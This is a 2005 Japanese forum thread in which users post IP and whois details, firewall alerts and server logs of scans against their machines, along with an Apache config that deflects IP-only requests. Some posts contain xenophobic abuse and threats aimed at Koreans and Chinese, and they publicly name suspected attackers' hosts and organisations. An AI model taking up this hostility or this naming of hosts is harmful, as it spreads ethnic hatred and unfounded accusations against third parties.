IPアドレス 218.176.253.65 ホスト名 dns-a.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 xDSL Whois 検索結果 ドメイン 所有者情報 bbtec.net を whois.internic.net / whois.discount-domain.com で検索しました >>> Last update of whois database: Tue, 28 Jun 2005 16:18:00 EDT <<< こいつマジでウザイ!トロイの木馬を何回もしかけてくる!
235 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 17:53:51
IPアドレス 219.253.208.66 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし こいつが、一番攻撃してくる! 韓国のアホ死ね!!!!!!
>>229 そりゃヤバイなwwwwwww
ストーキング入ってるし。
∩___∩ |
| ノ\ ヽ |
/ ●゛ ● | |
| ∪ ( _●_) ミ j
彡、 |∪| | J
/ ∩ノ ⊃ ヽ
>>229 ( \ / _ノ | |
.\ “ /__| |
\ /___ /
238 :
229 :2005/06/29(水) 22:39:52
>>238 _______ __
// ̄~`i ゝ `l |
/ / ,______ ,_____ ________ | | ____ TM
| | ___ // ̄ヽヽ // ̄ヽヽ (( ̄)) | | // ̄_>>
\ヽ、 |l | | | | | | | | ``( (. .| | | | ~~
`、二===-' ` ===' ' ` ===' ' // ̄ヽヽ |__ゝ ヽ二=''
ヽヽ___// 日本
_____ _____ ______ _______
| ウェブ | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
._________________
|パソコン 初心者 購入 ジャパネット |・検索オプション
└────────────────┘・表示設定
| Google検索 | I'm Feeling Lucky | ・言語ツール
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
○ウェブ全体から検索 ◎日本語のページを検索
243 :
名無しさん@お腹いっぱい。 :2005/06/30(木) 18:41:38
爆釣
>>229 巛彡彡ミミミミミ彡彡
巛巛巛巛巛巛巛彡彡
r、r.r 、|::::: |
r |_,|_,|_,||:::::: /' '\ |
|_,|_,|_,|/⌒ (・ ) (・ )| ハァ?
|_,|_,|_人そ(^i ⌒ ) ・・)'⌒ヽ
| ) ヽノ |. ┏━━━┓|
| `".`´ ノ ┃ ノ ̄i ┃|
人 入_ノ´ ┃ヽニニノ┃ノ\
/ \_/\\ ┗━━┛/|\\
/ \ ト ───イ/ ヽヽ
>>229 マジレスするとループバックアドレス
このループバックアドレスをGoogleで検索してごらん
>>245 やさしい子だなおまい。よくそう言われるだろ。
247 :
名無しさん@お腹いっぱい。 :2005/06/30(木) 21:41:23
>>247 馬鹿なカキコならびに中傷ゎログ公開するでww
戻る
プ
あぼーん
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ここから七月 ↓
↑ ↓ ↑←←←←←
IPアドレス 80.26.67.195 IPアドレス 60.36.212.59 ホスト名 195.Red-80-26-67.pooles.rima-tde.net ホスト名 i60-36-212-59.s04.a024.ap.plala.or.jp IPアドレス IPアドレス 割当国 ※ スペイン (ES) 割当国 ※ 日本 (JP) 都道府県 該当なし 都道府県 三重県 市外局番 該当なし 市外局番 -- 接続回線 該当なし 接続回線 光 IPアドレス 84.130.206.8 IPアドレス 81.215.55.217 ホスト名 p5482CE08.dip.t-dialin.net ホスト名 dsl.dynamic8121555217.ttnet.net.tr IPアドレス IPアドレス 割当国 ※ ドイツ (DE) 割当国 ※ トルコ (TR) 都道府県 該当なし 都道府県 該当なし 市外局番 該当なし 市外局番 該当なし 接続回線 該当なし 接続回線 該当なし IPアドレス 200.171.15.93 IPアドレス 64.4.12.201 ホスト名 200-171-15-93.dsl.telesp.net.br ホスト名 echo-v2.msgr.hotmail.com IPアドレス IPアドレス 割当国 ※ ブラジル (BR) 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 都道府県 該当なし 市外局番 該当なし 市外局番 該当なし 接続回線 該当なし 接続回線 該当なし IPアドレス 59.113.27.29 ホスト名 59-113-27-29.dynamic.hinet.net IPアドレス 割当国 ※ 台湾 (TW) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
255 :
名無しさん@お腹いっぱい。 :2005/07/02(土) 15:03:08
a8.net 死ね!
256 :
名無しさん@お腹いっぱい。 :2005/07/03(日) 10:27:57
>>249 があぼーんになってるんだが、
何が貼ってある?
258 :
名無しさん@お腹いっぱい。 :2005/07/03(日) 13:40:01
thx
259 :
名無しさん@お腹いっぱい。 :2005/07/03(日) 18:13:52
IPアドレス 211.119.77.19 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) IPアドレス 211.222.144.35 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) ころす、こっろーす!!
最近、127.0.0.1というIPから接続があって困っています。 とりあえずブロードバンドルーターを買ってきてつけてみたんですが、全然アクセスされます。今Bフレッツでインターネットをやっているんですが、ブロードバンドルーターとなにか関係があるんでしょうか? ちなみにOCNです。よろしくお願いします。
ヒント:マジレスを待て
>>260 ミミミミミ彡彡ミミミ | ̄ ̄ ̄|◎ | ̄| ロロ
ミ巛巛巛彡ミミ巛巛  ̄`フ | | ̄  ̄| __| ̄|_
/ ̄\ |:: __⌒ ⌒__ ::| / / | ̄  ̄||__ __ /| ̄ ̄|
, ┤ ト、. |: ノ-・ゝ ノ・-ゝ ::| \/  ̄|_| ̄ |__| 'ー'  ̄ ̄
l \__/ ヽ ⌒ )(・_・)( ⌒ 6)
| ___)( ̄ | ┃トヨョヨコイ┃ |
| __) ヽ.ノ ┃|ュココュ |┃ l
ヽ、__)_,ノ ヽ ┃ヽニニソ┃ /`ヽ、
\ \┗━━┛/ ヽ
`ー-、  ̄ ̄ ̄ ヘ
| Dodgers t__|
| | |
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 60.56.128.0/18 b. [ネットワーク名] K-OPTICOM f. [組織名] 株式会社ケイ・オプティコム g. [Organization] K-Opticom Corporation m. [管理者連絡窓口] YM555JP n. [技術連絡担当者] YM555JP n. [技術連絡担当者] HA3280JP p. [ネームサーバ] ns1.eonet.ne.jp p. [ネームサーバ] ns2.eonet.ne.jp [割当年月日] 2004/10/05 [最終更新] 2005/01/17 10:11:30(JST) 上位情報 ---------- 株式会社ケイ・オプティコム (K-Opticom Corporation) [割り振り] 60.56.0.0/16
265 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 03:50:16
>>265 >>260 は明らかにネタだが、ググると分かってない奴のブログが散見されるところをみて127.0.0.1がどこか外部からのIPアドレスと思ってるやつがいるな。
267 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 10:43:55
アドバイス通りバーチャルサーバ設定をしてみました。 こういう使い方をするものだったとは・・・。(知らなかったorz) 2005/07/01(16:56:36) W-SV nttkyo197175.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.156.175) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/01(17:07:38) W-SV nttkyo197175.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.156.175) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/01(18:41:11) W-SV nttkyo197175.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.156.175) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/02(14:16:35) W-SV ntszok054037.szok.nt.adsl.ppp.infoweb.ne.jp(220.146.194.37) [80] 302 29 "GET / HTTP/1.0" ( dummy ) しかしこいつらはなんなんだ。同じISPからのようだけど・・・。また220.*か。 そして 2005/07/02(15:31:19) W-SV ntoska106067.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.254.67) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/02(16:02:10) W-SV ntoska106067.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.254.67) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 大阪民国うぜー。 2005/07/03(09:49:36) W-SV nttkyo197229.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.156.229) [80] 302 29 "GET / HTTP/1.0" ( dummy ) (↑と同じアクセス者×5 間隔は数時間おきだったり数秒おきだったりした) 2005/07/03(17:24:38) W-SV nttkyo177095.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.136.95) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/04(00:45:20) W-SV ntkyto043223.kyto.nt.ftth.ppp.infoweb.ne.jp(220.146.64.223) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/04(01:58:04) W-SV nttkyo193145.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.152.145) [80] 302 29 "GET / HTTP/1.0" ( dummy ) きれいなまでに220.*からだ。(ホスト名なしもあった)
2005/07/04(10:49:38) W-SV ntoska105008.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.253.8) [80] 302 29 "GET / HTTP/1.0" ( dummy ) また大阪か。
269 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 13:25:12
IPアドレス 222.159.178.77 ホスト名 nttyma019077.tyma.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 富山県 市外局番 -- 接続回線 光
多分、プロキシ探し
272 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 23:07:34
273 :
名無しさん@お腹いっぱい。 :2005/07/05(火) 01:57:18
【中国】大規模ハッカー攻撃を計画 日本側狙い中国最大組織
tp://headlines.yahoo.co.jp/hl?a=20050701-00000169-kyodo-int
絶 対 に 負 け ら れ な い 戦 い が こ こ に あ る
軍 神 田 代 七 夕 迎 撃 戦
☆☆☆司令部☆☆☆(ネ申 ニュー速VIP板)
【織姫と】中国バカーVS日本ビパー【彦星が呆れてる】part105
http://ex11.2ch.net/test/read.cgi/news4vip/1120396339/l50 ■詳細情報のサイト(文字化けしているので、日本語自動選択にチェックで修正)
tp://vvipper.e-city.tv/1.htm
■まとめサイト
tp://vipmomizi.jog.buttobi.net/
>>267 そのためにある、ってことでもないけど、
httpへの不正アクセスはホスト名を伴わずIPアドレスだけでアクセスしてくるから、
Hostヘッダがないとアクセスできないバーチャルホスト設定の2番目以降のコンテナ(で設定したサーバ)には来ないわけ。
5年くらい前には携帯キャリアでHostヘッダを伴わないとこがあって不都合もあったけど、
いまはほぼすべてのブラウザが(Hostヘッダ必須の)HTTP1.1プロトコルもしくは
Hostヘッダを伴ったHTTP1.0プロトコルでアクセスしてくるから、
最初のコンテナでダミーを設定することでそのように使えるのよん。
<VirtualHost xxx.yyy.zzz.aaa>
ServerAdmin dummy
ServerName dummy
DocumentRoot /home/httpd/dummy/html
UserDir disabled
<Location />
Order deny,allow
Deny from all
</Location>
ErrorLog /var/log/httpd/dummy-error_log
CustomLog /var/log/httpd/dummy-access_log combined
</VirtualHost>
275 :
名無しさん@お腹いっぱい。 :2005/07/05(火) 07:08:39
IPアドレス 221.117.40.170 ホスト名 usen-221x117x40x170.ap-US01.usen.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光 すげー回数アタックしてきやがった。 なんかワームにでも感染してないかこの人。
IP Address: 219.156.123.196
HostName: 219.156.123.196
DShield Profile: Country: CN
Contact E-mail:
[email protected] AS Number: 4837
AS Name: CHINA169-Backbone
AS Contact:
[email protected] Total Records against IP: 67299
Number of targets: 62546
Date Range: 2005-07-03 to 2005-07-04
なんか最近さ、串刺してると思われるバカにしつこくアタックされる・・・
晒しても何にもならないけど一応・・・
>>274 なるほど。ためになりました。どうもです。
しかしよくくる・・・。
2005/07/04(11:04:11) W-SV ntoska105008.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.253.8) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/04(11:41:14) W-SV nttkyo211119.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.170.119) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/04(12:51:23) W-SV ntoska105008.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.253.8) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/05(01:56:27) W-SV ntiwte019131.iwte.nt.adsl.ppp.infoweb.ne.jp(220.146.229.131) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/05(02:00:05) W-SV ntsitm096241.sitm.nt.ftth.ppp.infoweb.ne.jp(220.146.111.241) [80] 302 29 "GET / HTTP/1.0" ( dummy )
>.277 ある程度はきてくれた方が、最近どんなのがはやってるか分かるからいいけど、/ にくるのってなんだっけ? 先日アナウンスのあったPHP製のなんとかいうウェブアプリ狙いのはこんな感じ。 61.135.134.238 - - [02/Jul/2005:02:32:44 +0900] "GET /forum/ HTTP/1.1" 403 278 " -" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:44 +0900] "GET /phpBB/ HTTP/1.1" 403 278 " -" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:46 +0900] "GET / HTTP/1.1" 403 272 "-" "Mo zilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:49 +0900] "GET /forums/ HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:49 +0900] "GET /phpbb/ HTTP/1.1" 403 278 " -" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:50 +0900] "GET /board/ HTTP/1.1" 403 278 " -" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:51 +0900] "GET /boards/ HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:51 +0900] "GET /phpBB2/ HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:55 +0900] "GET /msgboard/ HTTP/1.1" 403 28 1 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:57 +0900] "GET /foros/ HTTP/1.1" 403 278 " -" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)" 61.135.134.238 - - [02/Jul/2005:02:32:57 +0900] "GET /portal/ HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)"
IPアドレス 202.93.87.190 ホスト名 f32.mail.vip.bbt.yahoo.co.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
詳細: このコンピュータから試みた侵入「BD NetBus Pro 2.0」の対象は 219.122.235.184 を検出して遮断しました。 プロトコル: TCP IPアドレス 219.122.235.184 ホスト名 219-122-235-184.eonet.ne.jp 攻撃された ポート: 1024 IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 Domain Information: [ドメイン情報] a. [ドメイン名] EONET.NE.JP b. [ねっとわーくさーびすめい] いおねっと c. [ネットワークサービス名] eonet d. [Network Service Name] eonet k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] JM635JP n. [技術連絡担当者] KH4246JP p. [ネームサーバ] ns1.eonet.ne.jp p. [ネームサーバ] ns2.eonet.ne.jp [状態] Connected (2005/08/31) [登録年月日] 2000/08/30 [接続年月日] 2000/09/12 [最終更新] 2004/09/01 01:15:53 (JST)
旅行会社のサーバーに不正侵入容疑で留学生逮捕・警視庁 7月6日
http://it.nikkei.co.jp/security/news/index.aspx?i=2005070509837ca 旅行会社のクラブツーリズム(東京・新宿)のコンピューターサーバーが今年3月、
外部から不正アクセスされて最大約9万人分の個人情報が流出した疑いがある事件で、
警視庁ハイテク犯罪対策総合センターなどは5日までに、
東京都内の私立大学に通う20代の中国籍の留学生の男を不正アクセス禁止法違反などの疑いで逮捕した。
同センターによると、男は今年1月から6月にかけて、価格比較サービス大手「カカクコム」(東京・文京)のサイトや、
人材派遣大手「アデコ」(東京・港)、静岡新聞が運営する就職支援サイトにも不正に侵入した疑いが浮上しているという。
調べによると、男は3月15日から17日にかけ、自宅のパソコンからクラブツーリズム社が管理するサーバーに不正に侵入。
特殊な指令を入力し、ネットでツアーを申し込んだことがある会員のIDやパスワード、住所、氏名、性別、生年月日、メールアドレスなどを盗んだ疑い。
2005/07/05(17:57:18) W-SV 220.78.91.229 [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/05(20:32:02) W-SV tkbn112246.catv.ppp.infoweb.ne.jp(220.146.39.246) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/05(23:05:48) W-SV nttkyo211095.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.170.95) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/06(08:19:33) W-SV ntsitm101117.sitm.nt.ftth.ppp.infoweb.ne.jp(220.146.116.117) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/06(10:43:34) W-SV tkbn112064.catv.ppp.infoweb.ne.jp(220.146.39.64) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/06(11:53:17) W-SV tkbn112229.catv.ppp.infoweb.ne.jp(220.146.39.229) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 身内(同ISP)が多いのは気のせいじゃない気がしてきた。
127.0.0.1
>>283 あなたのIPアドレスも220からはじまるんじゃない?
近いところからアタックしていくようにプログラムされているものがなぜか多いし。
>>285 その通りです。今見たら220.146.*からのアクセスが多いようです。
今のIPも途中まで同じです。
しかも
>>283 の2005/07/06(11:53:17)と同じところからも来てる。
定期的にIP変えまくるしかないのかな。
2005/07/06(14:01:53) W-SV tkbn112229.catv.ppp.infoweb.ne.jp(220.146.39.229) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/06(15:01:13) W-SV nttkyo212218.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.171.218) [80] 302 29 "GET / HTTP/1.0" ( dummy )
>>286 変えたら変えたでまたその近くからくるよ。
そういうもんだから、対策だけしっかりやっておけばOK。
あとは、もし相手が日本の企業のサーバやパソコンだったら、
メールなどしてみて相手の対応を学んでみるというのもいいかも。
IT系の業務をしながら、結構いい加減なとこ多いよ。
288 :
名無しさん@お腹いっぱい。 :2005/07/07(木) 14:27:05
IPアドレス 210.142.225.38 ホスト名 cm038.cavy14.catvnet.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 香川県 市外局番 087 接続回線 CATV
IPアドレス 221.93.87.190
ホスト名
[email protected] IPアドレス
割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
[攻撃者の詳細] IPアドレス 221.16.12.15 ホスト名 YahooBB221016012015.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 ...お客さん、串通してるつもりなんでしょうけどねぇ...... 市外局番 -- 完全に漏れてまつよwwwww.......... 接続回線 xDSL ∧ ∧ /;;;;;;;;;;;;;;;;;;;;;i\ , -``-、 , -``-、 / ヽ ./ .∧ \;;;;;;;;;;;;;;;;;;;/ ヽ \ / ) / `、 / ∧ `、;;;;;;;;;;;;;;/ \ \ / / /  ̄ ̄ ̄ ヽ ヽ  ̄ ̄ / ( ̄ ̄ ̄ ̄ ̄祭りか? ̄ ̄ ̄) ̄祭りか? ̄ ̄)  ̄祭りか? ̄ ̄) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.\ ̄ ̄ ̄ ̄ ̄ ̄ \  ̄ ̄ ̄ ̄ ̄ ̄ \ /:::::::::: ヽ-=・=-′ ヽ-=・=- /=・- -==・- |・=- -=・=- | ヽ::::::::::: \___/ / \___/ / \___/ / ヽ__:::::::::::::: \/ /:::::::: \/ /::::::: \/ / /\\ //\\ //\\ //\ | \\ // |\\ // |\\ // |
IPアドレス 61.204.71.21 ホスト名 gw.smn.wacom-it.jp IPアドレス 割当国 ※ 日本 (JP) [登録者名] 株式会社ワコムアイティ [Registrant] WACOM-IT Co.,Ltd. いい加減にしろよ・・・・・・・ 島根、岡山の会社が俺に何の用があるんだ?
292 :
名無しさん@お腹いっぱい。 :2005/07/07(木) 21:19:08
IPアドレス 221.170.133.184 ホスト名 FLA1Abv184.stm.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 xDSL 日本電気カブー
293 :
名無しさん@お腹いっぱい。 :2005/07/08(金) 00:15:59
IPアドレス 219.58.142.21 ホスト名 YahooBB219058142021.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 新潟県 市外局番 -- 接続回線 xDSL
a. [IPネットワークアドレス] 61.125.192.0/18 b. [ネットワーク名] ASAHI-NET f. [組織名] 朝日ネット g. [Organization] Asahi Net
Network�Information:�[ネットワーク情報] a.�[IPネットワークアドレス]�����61.125.192.0/18 b.�[ネットワーク名]�������������ASAHI-NET f.�[組織名]���������������������朝日ネット g.�[Organization]���������������Asahi�Net m.�[管理者連絡窓口]�������������AT009JP n.�[技術連絡担当者]�������������AT009JP p.�[ネームサーバ]���������������crusader.asahi-net.or.jp p.�[ネームサーバ]���������������dns1.asahi-net.or.jp [割当年月日]��������������������2001/02/28 [返却年月日]�������������������� [最終更新]����������������������2004/04/14�10:07:04(JST) ��������������������������������
a.�[IPネットワークアドレス]�����218.219.192.0/18 b.�[ネットワーク名]�������������ASAHI-NET f.�[組織名]���������������������朝日ネット g.�[Organization]���������������Asahi�Net m.�[管理者連絡窓口]�������������YT5609JP n.�[技術連絡担当者]�������������YT5609JP p.�[ネームサーバ]���������������crusader.asahi-net.or.jp p.�[ネームサーバ]���������������dns1.asahi-net.or.jp
�IPアドレス��218.219.225.153� �ホスト名��l225153.ppp.asahi-net.or.jp� 日本
298 :
名無しさん@お腹いっぱい。 :2005/07/08(金) 01:27:28
Jul 7 12:32:04 xsv sshd[1236]: refused connect from usen-221x112x189x94.ap-US01.usen.ad.jp
2005/07/07(18:17:17) W-SV ip70-176-206-159.ph.ph.cox.net(70.176.206.159) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/07(19:18:17) W-SV tkbn112043.catv.ppp.infoweb.ne.jp(220.146.39.43) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/07(19:32:04) W-SV 220.119.165.184 [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/07(19:34:26) W-SV tkbn112043.catv.ppp.infoweb.ne.jp(220.146.39.43) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/07(23:37:31) W-SV ntakta017032.akta.nt.adsl.ppp.infoweb.ne.jp(220.146.107.32) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/07(23:43:01) W-SV ntakta017032.akta.nt.adsl.ppp.infoweb.ne.jp(220.146.107.32) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(05:45:50) W-SV 218.83.155.79 [80] 400 0 "GET http//217.106.232.38/default.shtml HTTP/1.1" ( * ) 2005/07/08(05:48:38) W-SV ool-18b92036.dyn.optonline.net(24.185.32.54) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(05:52:14) W-SV cpe-24-162-30-79.houston.res.rr.com(24.162.30.79) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(10:16:52) W-SV S010600600847591f.ed.shawcable.net(68.148.8.141) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(12:14:55) W-SV 68.152.78.250 [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(13:27:36) W-SV ntsitm102141.sitm.nt.ftth.ppp.infoweb.ne.jp(220.146.117.141) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(14:29:42) W-SV ntoska100123.oska.nt.ftth.ppp.infoweb.ne.jp(220.146.248.123) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(14:39:47) 2005/07/08(15:25:44) W-SV ntgifu038104.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.199.104) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(15:31:05) W-SV nttkyo195097.tkyo.nt.adsl.ppp.infoweb.ne.jp(220.146.154.97) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(15:32:45) W-SV ntgifu038104.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.199.104) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/08(15:35:25) 2005/07/08(16:20:32) 2005/07/08(16:33:19) 空白は直前と同じ。うぜーよこれ・・・。
IPアドレス 64.94.110.11 ホスト名 crl.verisign.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ホットドッグでも食ってろボケ!
FW無効にしたらどうなるの?
303 :
名無しさん@お腹いっぱい。 :2005/07/09(土) 22:46:05
>>300 ワラタ おまぇちったー勉強せよw 今後はhttpsのサイト禁止なwww
304 :
名無しさん@お腹いっぱい。 :2005/07/09(土) 23:15:30
IPアドレス 218.188.0.146 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 香港 (HK) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
305 :
名無しさん@お腹いっぱい。 :2005/07/09(土) 23:16:21
IPアドレス 66.160.191.67 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
306 :
名無しさん@お腹いっぱい。 :2005/07/09(土) 23:26:44
ウィルスバスター2005使用です。 さっきメイン画面のログからパーソナルファイアーウォール見たら不正アクセスされてるみたいだw ファイヤーウォールでブロックしているから大丈夫だよね??
もう終わり〜だね
308 :
名無しさん@お腹いっぱい。 :2005/07/10(日) 01:18:22
>>306 大丈夫だよね?ってのは聞かれても分からんよ。
もしかしたら突破されてログ残ってないもんもあるかもしれんし(ガクガク
ルーターまだないんだったら、
防壁の性能が良さ目なのを投入しておくのが良いかなと。
309 :
名無しさん@お腹いっぱい。 :2005/07/10(日) 03:34:48
IPアドレス 61.195.156.37 ホスト名 sv.clickbanner.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし Contact Information: [公開連絡窓口] [名前] クリックバナー 有限会社 [Name] Clicknbanner Inc.
311 :
名無しさん@お腹いっぱい。 :2005/07/10(日) 16:31:38
IPアドレス 198.110.97.22
ホスト名 faramir.cs.hope.edu
IPアドレス
割当国 ※ アメリカ合衆国 (US)
Domain Name: HOPE.EDU
Registrant:
Hope College
Computing and Information Technology
110 E. 10th Street
教育機関?
ホープカレッジ
ttp://www.hope.edu/
312 :
名無しさん@お腹いっぱい。 :2005/07/11(月) 16:15:47
2005/07/11(14:07:30) W-SV static81-223-147-194.xdsl-line.inode.at(81.223.147.194) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/11(16:11:06) W-SV static81-223-147-194.xdsl-line.inode.at(81.223.147.194) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/10(15:35:03) W-SV ntymgc025118.ymgc.nt.adsl.ppp.infoweb.ne.jp(220.146.179.118) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/10(16:00:08) W-SV ntymgc025118.ymgc.nt.adsl.ppp.infoweb.ne.jp(220.146.179.118) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/10(17:56:05) W-SV ntymgc025118.ymgc.nt.adsl.ppp.infoweb.ne.jp(220.146.179.118) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/11(12:59:07) W-SV tkbn112048.catv.ppp.infoweb.ne.jp(220.146.39.48) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/11(14:15:41) W-SV tkbn112048.catv.ppp.infoweb.ne.jp(220.146.39.48) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/10(15:53:36) W-SV tkbn112075.catv.ppp.infoweb.ne.jp(220.146.39.75) [80] 302 29 "GET / HTTP/1.0" ( dummy ) ↑こいつらうざすぎ。 ↓おまけ 2005/07/11(00:19:33) W-SV ntngno048235.ngno.nt.ftth.ppp.infoweb.ne.jp(220.146.58.235) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/11(10:07:53) W-SV ntkyto040190.kyto.nt.ftth.ppp.infoweb.ne.jp(220.146.25.190) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/10(12:44:23) W-SV 220.163.63.87 [80] 302 29 "GET / HTTP/1.0" ( dummy )
313 :
名無しさん@お腹いっぱい。 :2005/07/12(火) 01:13:21
IPアドレス 222.138.109.138 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
>>312 なんでルートばっかりなん?
Windowsサーバっぽいけど、サーバがログ時に/以下を切りおとしてるとか?
>>314 なぜルートばかりかは俺にもわからない。
ログはきちんと動作している。(試しに外部からアクセスすると正常にログが残る。
ご指摘の通りWin鯖。
また来てる。(URLは一応リンクされないようにしてある
